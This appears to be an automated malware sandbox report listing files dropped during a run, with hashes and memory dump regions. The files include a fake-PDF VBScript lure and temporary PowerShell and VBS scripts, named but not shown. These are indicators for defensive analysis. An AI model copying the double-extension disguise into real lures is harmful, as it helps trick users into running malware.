301a544a5929a7f5873dd806d565a5956746834d5c9e422a016e2e3ca74185f8a23f0a29bd925210ea54816b86934f0c664fdd14aa7aab2c19cc712790a1f7bb

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
5KB

MD5
5f9db818327288c1721d6654dbe6a806

SHA1
b2724cd86851f3b002333fe1a333bfe68e66b349

SHA256
e6e5ed8b6f973993961734d8c77807b1f2c5741876880c3bce601ebbc5fb6691

SHA512
92451a272d2dfa0c2deac17051f04c2033f5180a45e57f48d74027943d2fb23cbb2a7268db9acc1804ef1280cbf5fdfd82bd95444c433f1d4aac03367e06fd12

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
a4473e425cec0332a49fd43357c1b55f

SHA1
db0171740c9411fd8861b18aa8d4c4c57e28a7fe

SHA256
26376e2c89f9357a411c8473e21fba292bee4321e378dbeab7073f62e1ad9bca

SHA512
ffafb69f67b905ed6be573582da07946c8397f5ff7c755a280b6a3435565e8372817a245e5d2032fc5846f310c6087529110b78a46414e87e5499ba3012eaee5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
87947cd88d18d5585b5e296023a348e5

SHA1
595d4d0cf066d88e3457e9867e9e98c09bddb7d5

SHA256
48e060abf695cfee3ba4e8050217f2763cd64c26d7c0152349377c175fd749bd

SHA512
8a3dc6d87e4319621d2548b267ce52b69b1e37c86bf281eb5cd42edcada7f65ca00e81eab60e2460b0570c33bd3a81693edeb022698914db1a36ca87f910418c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
c674ea9e8c91d7e7f0972d6f444547e2

SHA1
6c689824f955213eb67dead450f1035f58fa513f

SHA256
e300e72c894e0b262576b8b36f8df4d00105b3960ff482be6c11d5f415ac0132

SHA512
fb23beb55c552fe6cb56f6bd0b0f2adba6efda393d5f8d10bf0072728bd99afddc07375480d9f118f8e4dd44fcbdb7de6840b0c804ce016730ed28a4c52e8011

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
6d87001ce1dac0471b5b23767e92f94d

SHA1
059e1f47fcf27723a071bae7973cc620f587bf37

SHA256
a8dee71354a891fa0064740df4cd6c6cfce562dd73fd1886f43a9d4953e71374

SHA512
40272149882abc6175ab069cd8dea3aab1800d433c4b8a8145cb90493fc24a1b8d7c4f3398375c0bf98eedb682b9b97a28ae0c5b667e3c951ecff73bd684accd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
76ed68c1c5f648db28c26a8a55080877

SHA1
2bf23d6a0279dd2e93c686c277d8514c26df4721

SHA256
997efe46721a1d15fc24f097587295e9984fd40335cbd40ffe1c4216c28e7302

SHA512
eca11ea72dd8208f1691211ff808bc9694388ddb8ba01149937d90b7c14e6e90fa9764ea237975402906e8bdfd79992205a754c4fd80e10922c3df8fb48e6dff

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
04c257bcab19d01f59f1f7d57d205e1f

SHA1
9cab703d96cfcc1e2e77de4a27506b2fe85c4f82

SHA256
2160ca6314859bf0de4e25fc1465ec3828cf8890d839f0dccd1fadfebf9784b4

SHA512
2af8ff506a80aa4a7e4148c0ce161bf0b8e4b1c003c85e73d337931e6f158816e6e6babffcbea6ee1e1bdee687d03eb003651dec4dcd0e8079f09197349064f9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
31b75b6b7414d545bcd4af245e9d373f

SHA1
c0b63e5d9b7c988e4ee78a4a77c0403310a95a4e

SHA256
a0af9a4dd36d6b585308c96cc36d558c0150e22fca71f143c621692224b35e0e

SHA512
3a601797a083e242d0b328e43ca48f440040a77776c9fb389ad4bb1c21b9baa7e21929bc5e430c423b0d76132a64e41340f636148489c6b01b6ce8ae64d8bac1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
d05c9cfa723b11ec9e9c52be81233981

SHA1
d447f21d2e2e5baca5787d2a19f319b329a9b528

SHA256
57e280f7b7dd2352ffc6bf93366e68af0ff5f3100bce5cac8bb17257f6f4ca7f

SHA512
fee14af6b7a28c8c1174ac3f105f0d0b369bf83eeec8005cd8cadcee1613625bcd3dcfba7b425cca80ca4d7b309b9885e52e5d3727e3bb5e5ffa10b7d15bc7fc

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
7b0d69205a80bce479a0bebddc363951

SHA1
3247509882c4fb642df88791e82475bda391c1f4

SHA256
7dd4e7f0c45aded37336b29ceb00e96606358c24cdd97a41d48af6709a25386d

SHA512
29603667a2e814eccc31ad187e6e4304820d8b5b74323c66b23f1f531303265ff7c19208046d4a5a8f7b8a67b4238e62424b8e4f544445296743d4d2f0298520

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
9d44fe2ac802639f000d5ca9d99cafe3

SHA1
1cbc276430f248dee599d91540f89a6731d4aa43

SHA256
347c752d2e7458320e0965d46b15fa815e10da0a0abbb7dd1abeb5eb9bfa21c3

SHA512
bfe3c91b29c549a41bb4ee649e4555a14f6a0f148a10858e5bc7a1071c6fb380d4cecac438d5f4b4e51d6e373fda84306816493e04a56b4d464302d765aecaec

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
fd2a87188c1fcb31e625c4b9607e3cc1

SHA1
20f330447043f717b0a92b10a2c4755b908aa49e

SHA256
0c9629b97995f3625586a28bfa8921fdd26e36779b4d5b1c6c2580ce6987545f

SHA512
8109f04590d242108b43619c1df990daf06dce564e9d3cc0c58e26395c2a9dfa1390e72046483c7575ef486ab5b98f6c50540caf7a381db7c9303da6c54905f2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
116KB

MD5
2de8743e93231060e6aec5377951918a

SHA1
84d184c0f3428ddfdd746d7b5c60d869d87b9af7

SHA256
35381ac201474520ab2286fa914ce3f3e2683555e7683f2e9a9351812cb2c73e

SHA512
a80fb9251d30fc6e693c421a06b9824d588355d14a64495f527743e091e78137530a1cd0d2007b5cae6251f2e576b0978aa20c63803ea27f8769fe56c390506f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
116KB

MD5
341655ec940d36c79a6fcecabe30ddd9

SHA1
c7da65686d8494158f7f19fdc3aab4eeef3e6f5a

SHA256
0094e47db530f8edd12224de884bea5accb36f4e6c841d00ba1191384f4523d5

SHA512
a233567efa61f10d95303e7e1edd63c6e82570b37f07172ab65371fa51dcbb749a1d0463240cc362edbbc8b2bdba33c23b8f7b843b1abd4fe8e263f2afcc941f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
223bd4ae02766ddc32e6145fd1a29301

SHA1
900cfd6526d7e33fb4039a1cc2790ea049bc2c5b

SHA256
1022ec2fed08ff473817fc53893e192a8e33e6a16f3d2c8cb6fd37f49c938e1e

SHA512
648cd3f8a89a18128d2b1bf960835e087a74cdbc783dbfcc712b3cb9e3a2e4f715e534ba2ef81d89af8f60d4882f6859373248c875ceb26ad0922e891f2e74cc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AddInProcess32.exe.log

Filesize
425B

MD5
4eaca4566b22b01cd3bc115b9b0b2196

SHA1
e743e0792c19f71740416e7b3c061d9f1336bf94

SHA256
34ba0ab8d1850e7825763f413142a333ccbc05fa2b5499a28a7d27b8a1c5b4bb

SHA512
bc2b1bf45203e3bb3009a7d37617b8f0f7ffa613680b32de2b963e39d2cf1650614d7035a0cf78f35a4f5cb17a2a439e2e07deaefd2a4275a62efd0a5c0184a1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b138471334bb50e38b7fb5cb817e31b7

SHA1
bcdaeadb974f3caf0861c6b9a72f90951d51abf2

SHA256
4822a32741638f6766340d9f422f4cd1462f11db711e3afedae836a31e4d0d5d

SHA512
87c00a67e63aacebb55966ac4a7f9c54f90b808393ea01192df3b5e30b1f50e15d2f5e0714e60cb7cad1d9a412beae24ceb19efa10941a1d9dfc2d210d1aec03

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
57e5722c0859e5c48f35caa86c999685

SHA1
1bc10b1ae925dbbca5f7e3bfe05e06af011a11a6

SHA256
43ec03936dd052de2868a8ffb4fa19056962d12e288b841e8f4deff07bce1742

SHA512
abbdd91b771dfbe28d809133ff6466e823868e65bb51fc754c5371ef6d62a6160d261ce1171942643d014fe450a5dce38a38e50728d280967373ba2583a16007

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
784627550f50a6dbd96d3c347aa2915e

SHA1
4f421a3541ee343f51c814dd8fcca832411b272f

SHA256
3a52cea31b95dbd97f7f8c568428b8b8c2ceb90052932f71caf9430622a28fb5

SHA512
3f97660dbad697492beb0726714e617d4373505905e2061feb3e9837a4a4ac553953e9ac4f837d537ec1ef5ee3c9ae5ec3390b2623524c4bdca37a136a47192d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
3ca1082427d7b2cd417d7c0b7fd95e4e

SHA1
b0482ff5b58ffff4f5242d77330b064190f269d3

SHA256
31f15dc6986680b158468bf0b4a1c00982b07b2889f360befd8a466113940d8f

SHA512
bbcfd8ea1e815524fda500b187483539be4a8865939f24c6e713f0a3bd90b69b4367c36aa2b09886b2006b685f81f0a77eec23ab58b7e2fb75304b412deb6ca3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5b5352c55a8e79ac8de4be3202d496a1

SHA1
4a263d9e36e5ef972e4b19035cae169e1df6459c

SHA256
eff52a77e2fd653199c31162fbd5557a83995ef0e6e0570bf6495d1b5386b3b8

SHA512
c4e5e245c427bc6f9cc95ae80efbd46fd432bea5a4f9366332b1850d833316e6f4eab0e25259b2ea39c40724dcae91ba748234cb1a3cf95b38d8fed162741d63

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
8c754978148345fe06920ff5950301c1

SHA1
52a42eac7264ddb41433d19ce6283786450a097e

SHA256
2e9956f11b8c0c4a8666e9d16fdadedb10a3c8a43f082b8d515758445fb96233

SHA512
d1c085facdc3c577491824946e9d36e6c1728b9c273abf936cae284fee0bfbace63923dfddc2adf1efb37496ff2c263fe2b8752d4c569c07d7add8d2c1cc7f3a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
08492ea7e34e8fdbc062cd28ebd7e751

SHA1
eeff5162f70d42ba58bd8716b833aba3f74e4ec8

SHA256
229288f2516797664b60d6a8d3e00547dc623a4052375c9b7744f2e5f03a88c3

SHA512
f86113ee90a126635debc518bac1a92722b9dd9bafe41ab561823660139805a2c0d3693a2a8fade41cb2d41eca8afaa55acae09bb9381f3abc2fc5b00e69a651

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zOCE3EA7F8\ad900090014424524524252.,pdf.vbs

Filesize
3.1MB

MD5
bcc5decba123240e32cb62d88b904e64

SHA1
9f768a6fa3f446650cd24fc86634886605e5ac65

SHA256
b3597f969df0887883ec27279617eeb64f559cc5c37f108d631c5c353cc19dd6

SHA512
def9478521d44514b92e7d2105e9b7c9b4be25ae5ad303224e1046b95ebcd20238bf1a6e558c3599d8fec7d4d0145a74863980d2a20bdba7d18a2108db3069dd

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cyopmtv4.4m5.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\dll01.txt

Filesize
31B

MD5
415db1ec45d3e4398b97cf2f152c233b

SHA1
341eacc90604bde86dcbeadb2a337ec13fb700f1

SHA256
4a102cefe60d228fa6f84459d83ccfe447e0af510bdf230e63e787b498146528

SHA512
13b8a542ed949d3e3304430cedf77b83c1715d1fc6d6837d74c6d81aea25cfffcebdf482ef2ab43ecb3ed8f786d6f7e6703138e0eb589d485521277d6a4b83f7

Download Submit
C:\Users\Admin\AppData\Local\Temp\dll01.txt

Filesize
169KB

MD5
23f5d45d710513e6945a91beec2eb5bd

SHA1
0deb79fe1b023812be18f9a648be3657b1176880

SHA256
7688bcea3662706a68c3a69149480d4899550f64334114bb4a4b2e0a1c6ac262

SHA512
06f30c67ab311d1a712590a778d2bd887d152631d5c4bda2e8eff5db72d0f58d8b7986a9b01d6b2eb8371aaaed647d5fb7504ff19d0aa0660ed861b03f2fbdc4

Download Submit
C:\Users\Admin\AppData\Local\Temp\xx1.ps1

Filesize
287B

MD5
6d5521c5526af14ecffd09d0aabfb6f0

SHA1
a67ad1f00662a86b7b6ecbda97fe037a0f2a1901

SHA256
738ebbf5fe90a4d46bf50958ded3fe771392765294114508e3409a399bd933d1

SHA512
9d75e49d6ae2a04c4c787c89889034139a67e35ed4133bd67e5b7b4fc392635e755940515447695826f4e39fb1bbc1c205b9e729cf8c439ba48cf62a1543900c

Download Submit
C:\Users\Admin\AppData\Local\Temp\xx2.vbs

Filesize
211B

MD5
89395d8b09dc0cb0d86d2236bb1ea1a5

SHA1
07ea9c925526cb2a3363403c2499dd4411af236e

SHA256
864aa3ce2321ce687c7640a6541be09e6de972320444624b8348766a3735b4b0

SHA512
7549cc56ed465a099796bd6a471e5888a98a0ad10ff2d85689bf8bf799f0d687b9d8f68ff166ec3668ea662f5073106f9a4dceb967b0404f3a2b3d0f3bfb9ece

Download Submit
C:\Users\Admin\Downloads\ad900090014424524524252.,pdf.uu

Filesize
3KB

MD5
4b6563d12dc1f89566c26614668c610d

SHA1
810f08342b038078441faedc199d05c3dee4be4c

SHA256
be102bf12c50a298873aa3c4a671700ad8661f401846532f0e666db903143a61

SHA512
0725faea1219edb760a94cd0016fac1dbe108757f60ca0253cf3abc3c1fcd83116c20d6381107a41bea4dac2ce671e0fcfc85e488d239ca9c17e98950ff95b52

Download Submit
memory/2932-164-0x000002A777B90000-0x000002A777BB2000-memory.dmp

Filesize
136KB

Download
memory/2932-163-0x000002A777BF0000-0x000002A777C72000-memory.dmp

Filesize
520KB

Download
memory/2932-175-0x000002A777E90000-0x000002A777F92000-memory.dmp

Filesize
1.0MB

Download
memory/2932-174-0x000002A777680000-0x000002A777690000-memory.dmp

Filesize
64KB

Download
memory/3384-432-0x000002145ED20000-0x000002145ED36000-memory.dmp

Filesize
88KB

Download
memory/3616-300-0x0000020C7C150000-0x0000020C7C166000-memory.dmp

Filesize
88KB

Download
memory/3616-185-0x0000020C7C0B0000-0x0000020C7C0C4000-memory.dmp

Filesize
80KB

Download
memory/3616-201-0x0000020C7BCA0000-0x0000020C7BCB6000-memory.dmp

Filesize
88KB

Download
memory/3700-404-0x0000021F548F0000-0x0000021F54906000-memory.dmp

Filesize
88KB

Download
memory/3700-340-0x0000021F3C490000-0x0000021F3C4A6000-memory.dmp

Filesize
88KB

Download
memory/3976-226-0x0000028276A00000-0x0000028276A0A000-memory.dmp

Filesize
40KB

Download
memory/4324-409-0x0000000005830000-0x00000000058CC000-memory.dmp

Filesize
624KB

Download
memory/4324-416-0x0000000005E80000-0x0000000006424000-memory.dmp

Filesize
5.6MB

Download
memory/4324-417-0x00000000058D0000-0x0000000005936000-memory.dmp

Filesize
408KB

Download
memory/4324-339-0x00000000053B0000-0x00000000054B2000-memory.dmp

Filesize
1.0MB

Download
memory/4324-304-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download